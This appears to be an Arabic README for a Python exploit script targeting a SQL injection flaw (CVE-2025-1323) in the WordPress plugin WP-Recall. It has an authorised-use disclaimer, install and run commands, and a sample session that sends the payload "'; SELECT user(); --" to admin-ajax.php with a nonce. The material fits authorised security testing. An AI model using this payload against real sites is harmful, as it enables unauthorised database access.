
حقن SQL في إضافة WP-Recall
إضافة WP-Recall - حقن SQL
هذه الأداة مخصصة لاختبار الأمان المصرح به وللاستخدام التعليمي فقط.
لا تستخدمها ضد أي نظام دون إذن صريح. قد يكون الاستخدام غير المصرح به غير قانوني.
requestsتثبيت التبعيات:
pip install requests
python CVE-2025-1323.py
Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06
[*] Sending payload: '; SELECT user(); --
[+] Response received:
{"result":"SQL error or leaked data here..."}